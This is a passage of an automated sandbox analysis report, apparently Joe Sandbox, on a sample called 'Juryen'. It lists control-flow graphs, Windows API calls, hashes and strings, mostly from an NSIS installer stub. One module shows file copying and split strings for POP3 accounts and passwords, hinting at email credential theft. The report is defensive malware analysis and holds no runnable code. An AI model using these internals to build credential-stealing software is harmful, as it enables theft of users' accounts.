450->456 457 405448-40544b 450->457 451->441 451->446 452->384 453->454 454->448 454->449 456->457 458 405452-40545b 457->458 459 40544d-405450 457->459 462 405460-405498 SendMessageW * 2 458->462 463 40545d 458->463 459->462 462->451 463->462
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                    • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                    • DeleteObject.GDI32(00000000), ref: 00405027
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                    • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405357
                                                                    • GlobalFree.KERNEL32(?), ref: 00405367
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                    • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                    • ShowWindow.USER32(00000000), ref: 00405523
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 2564846305-813528018
                                                                    • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                    • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                    Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 464 403fc1-403fd3 465 403fd9-403fdf 464->465 466 40413a-404149 464->466 465->466 467 403fe5-403fee 465->467 468 404198-4041ad 466->468 469 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 466->469 472 403ff0-403ffd SetWindowPos 467->472 473 404003-40400a 467->473 470 4041ed-4041f2 call 40450c 468->470 471 4041af-4041b2 468->471 469->468 483 4041f7-404212 470->483 475 4041b4-4041bf call 401389 471->475 476 4041e5-4041e7 471->476 472->473 478 40400c-404026 ShowWindow 473->478 479 40404e-404054 473->479 475->476 500 4041c1-4041e0 SendMessageW 475->500 476->470 482 40448d 476->482 484 404127-404135 call 404527 478->484 485 40402c-40403f GetWindowLongW 478->485 486 404056-404068 DestroyWindow 479->486 487 40406d-404070 479->487 494 40448f-404496 482->494 491 404214-404216 call 40140b 483->491 492 40421b-404221 483->492 484->494 485->484 493 404045-404048 ShowWindow 485->493 495 40446a-404470 486->495 497 404072-40407e SetWindowLongW 487->497 498 404083-404089 487->498 491->492 504 404227-404232 492->504 505 40444b-404464 DestroyWindow EndDialog 492->505 493->479 495->482 503 404472-404478 495->503 497->494 498->484 499 40408f-40409e GetDlgItem 498->499 506 4040a0-4040b7 SendMessageW IsWindowEnabled 499->506 507 4040bd-4040c0 499->507 500->494 503->482 508 40447a-404483 ShowWindow 503->508 504->505 509 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 504->509 505->495 506->482 506->507 510 4040c2-4040c3 507->510 511 4040c5-4040c8 507->511 508->482 536 404287-40428c 509->536 537 40428f-4042cb ShowWindow EnableWindow call 4044e2 EnableWindow 509->537 513 4040f3-4040f8 call 404499 510->513 514 4040d6-4040db 511->514 515 4040ca-4040d0 511->515 513->484 518 404111-404121 SendMessageW 514->518 520 4040dd-4040e3 514->520 515->518 519 4040d2-4040d4 515->519 518->484 519->513 524 4040e5-4040eb call 40140b 520->524 525 4040fa-404103 call 40140b 520->525 534 4040f1 524->534 525->484 533 404105-40410f 525->533 533->534 534->513 536->537 540 4042d0 537->540 541 4042cd-4042ce 537->541 542 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 540->542 541->542 543 404302-404313 SendMessageW 542->543 544 404315 542->544 545 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 543->545 544->545 545->483 556 404360-404362 545->556 556->483 557 404368-40436c 556->557 558 40438b-40439f DestroyWindow 557->558 559 40436e-404374 557->559 558->495 560 4043a5-4043d2 CreateDialogParamW 558->560 559->482 561 40437a-404380 559->561 560->495 562 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 560->562 561->483 563 404386 561->563 562->482 568 404431-404449 ShowWindow call 40450c 562->568 563->482 568->495
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                    • ShowWindow.USER32(?), ref: 0040401D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                    • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                    • DestroyWindow.USER32 ref: 0040405C
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                    • GetDlgItem.USER32(?,?), ref: 00404094
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                    • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                    • EnableWindow.USER32(?,?), ref: 004042A8
                                                                    • EnableWindow.USER32(?,?), ref: 004042C3
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                    • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                    • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                    • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                    • String ID:
                                                                    • API String ID: 1860320154-0
                                                                    • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                    • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E
                                                                    Function 00403C13 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 571 403c13-403c2b call 406935 574 403c2d-403c3d call 406488 571->574 575 403c3f-403c76 call 40640f 571->575 584 403c99-403cc2 call 403ee9 call 405f18 574->584 580 403c78-403c89 call 40640f 575->580 581 403c8e-403c94 lstrcatW 575->581 580->581 581->584 589 403d54-403d5c call 405f18 584->589 590 403cc8-403ccd 584->590 596 403d6a-403d8f LoadImageW 589->596 597 403d5e-403d65 call 40657e 589->597 590->589 592 403cd3-403cfb call 40640f 590->592 592->589 598 403cfd-403d01 592->598 600 403e10-403e18 call 40140b 596->600 601 403d91-403dc1 RegisterClassW 596->601 597->596 602 403d13-403d1f lstrlenW 598->602 603 403d03-403d10 call 405e3d 598->603 614 403e22-403e2d call 403ee9 600->614 615 403e1a-403e1d 600->615 604 403dc7-403e0b SystemParametersInfoW CreateWindowExW 601->604 605 403edf 601->605 609 403d21-403d2f lstrcmpiW 602->609 610 403d47-403d4f call 405e10 call 406541 602->610 603->602 604->600 608 403ee1-403ee8 605->608 609->610 613 403d31-403d3b GetFileAttributesW 609->613 610->589 617 403d41-403d42 call 405e5c 613->617 618 403d3d-403d3f 613->618 624 403e33-403e4d ShowWindow call 4068c5 614->624 625 403eb6-403ebe call 405699 614->625 615->608 617->610 618->610 618->617 630 403e59-403e6b GetClassInfoW 624->630 631 403e4f-403e54 call 4068c5 624->631 632 403ec0-403ec6 625->632 633 403ed8-403eda call 40140b 625->633 636 403e83-403eb4 DialogBoxParamW call 40140b call 403b63 630->636 637 403e6d-403e7d GetClassInfoW RegisterClassW 630->637 631->630 632->615 638 403ecc-403ed3 call 40140b 632->638 633->605 636->608 637->636 638->615
                                                                    APIs
                                                                      • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                      • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                    • lstrcatW.KERNEL32(00436000,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420,00436800,00000000,00434000,00008001), ref: 00403C94
                                                                    • lstrlenW.KERNEL32(004279C0,?,?,?,004279C0,00000000,00434800,00436000,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403D14
                                                                    • lstrcmpiW.KERNEL32(004279B8,.exe,004279C0,?,?,?,004279C0,00000000,00434800,00436000,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                    • GetFileAttributesW.KERNEL32(004279C0), ref: 00403D32
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403D7B
                                                                      • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                    • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-1115850852
                                                                    • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                    • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D
                                                                    Function 0040467F Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 645 40467f-404691 646 4047b1-4047be 645->646 647 404697-40469f 645->647 648 4047c0-4047c9 646->648 649 40481b-40481f 646->649 650 4046a1-4046b0 647->650 651 4046b2-4046d6 647->651 654 4048f4 648->654 655 4047cf-4047d5 648->655 652 4048e5-4048ec 649->652 653 404825-40483d GetDlgItem 649->653 650->651 656 4046d8 651->656 657 4046df-40475a call 4044c0 * 2 CheckDlgButton call 4044e2 GetDlgItem call 4044f5 SendMessageW 651->657 652->654 659 4048ee 652->659 661 4048a6-4048ad 653->661 662 40483f-404846 653->662 660 4048f7-4048fe call 404527 654->660 655->654 663 4047db-4047e6 655->663 656->657 687 404765-4047ac SendMessageW * 2 lstrlenW SendMessageW * 2 657->687 688 40475c-40475f GetSysColor 657->688 659->654 670 404903-404907 660->670 661->660 667 4048af-4048b6 661->667 662->661 666 404848-404863 662->666 663->654 668 4047ec-404816 GetDlgItem SendMessageW call 4044e2 call 40490a 663->668 666->661 671 404865-4048a3 SendMessageW LoadCursorW SetCursor call 40492e LoadCursorW SetCursor 666->671 667->660 672 4048b8-4048bc 667->672 668->649 671->661 677 4048ce-4048d2 672->677 678 4048be-4048cc SendMessageW 672->678 682 4048e0-4048e3 677->682 683 4048d4-4048de SendMessageW 677->683 678->677 682->670 683->682 687->670 688->687
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                    • GetSysColor.USER32(?), ref: 0040475F
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                    • lstrlenW.KERNEL32(?), ref: 00404780
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                    • SendMessageW.USER32(00000000), ref: 00404802
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                    • SetCursor.USER32(00000000), ref: 00404881
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                    • SetCursor.USER32(00000000), ref: 0040489D
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: N
                                                                    • API String ID: 3103080414-1130791706
                                                                    • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                    • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                    Function 1F75173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 689 1f75173a-1f7517fe call 1f75c030 call 1f752c40 * 2 696 1f751803 call 1f751cca 689->696 697 1f751808-1f75180c 696->697 698 1f751812-1f751816 697->698 699 1f7519ad-1f7519b1 697->699 698->699 700 1f75181c-1f751837 call 1f751ede 698->700 703 1f75183d-1f751845 700->703 704 1f75199f-1f7519ac call 1f751ee7 * 2 700->704 705 1f751982-1f751985 703->705 706 1f75184b-1f75184e 703->706 704->699 708 1f751995-1f751999 705->708 709 1f751987 705->709 706->705 710 1f751854-1f751881 call 1f7544b0 * 2 call 1f751db7 706->710 708->703 708->704 712 1f75198a-1f75198d call 1f752c40 709->712 723 1f751887-1f75189f call 1f7544b0 call 1f751db7 710->723 724 1f75193d-1f751943 710->724 718 1f751992 712->718 718->708 723->724 740 1f7518a5-1f7518a8 723->740 726 1f751945-1f751947 724->726 727 1f75197e-1f751980 724->727 726->727 729 1f751949-1f75194b 726->729 727->712 731 1f751961-1f75197c call 1f7516aa 729->731 732 1f75194d-1f75194f 729->732 731->718 735 1f751955-1f751957 732->735 736 1f751951-1f751953 732->736 737 1f75195d-1f75195f 735->737 738 1f751959-1f75195b 735->738 736->731 736->735 737->727 737->731 738->731 738->737 741 1f7518c4-1f7518dc call 1f7544b0 call 1f751db7 740->741 742 1f7518aa-1f7518c2 call 1f7544b0 call 1f751db7 740->742 741->708 751 1f7518e2-1f75193b call 1f7516aa call 1f7515da call 1f752c40 * 2 741->751 742->741 742->751 751->708
                                                                    APIs
                                                                      • Part of subcall function 1F751CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D1B
                                                                      • Part of subcall function 1F751CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1F751D37
                                                                      • Part of subcall function 1F751CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D4B
                                                                    • _strlen.LIBCMT ref: 1F751855
                                                                    • _strlen.LIBCMT ref: 1F751869
                                                                    • _strlen.LIBCMT ref: 1F75188B
                                                                    • _strlen.LIBCMT ref: 1F7518AE
                                                                    • _strlen.LIBCMT ref: 1F7518C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                    • API String ID: 3296212668-3023110444
                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction ID: ee42c1fabca43c8cb2b981c440c683e12015de73367f40d0dfef61e0856680d6
                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction Fuzzy Hash: 92610475D00358ABEF15CBA4F844BDEB7B9AF45309F00415AD104AB274EBB47A45CF92
                                                                    Function 1F7519B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                    • API String ID: 4218353326-230879103
                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction ID: 597c4213dc94dff58d370ff3411a39f5ac0dd639f4892531270d6eb8f515586e
                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction Fuzzy Hash: 937108B5D003695BDF119FF4AC98AEF7BFC9F09201F104096E548E7251E674AB89CBA0
                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                    • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                    Function 00406187 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                    • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                    • wsprintfA.USER32 ref: 00406206
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNEL32(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
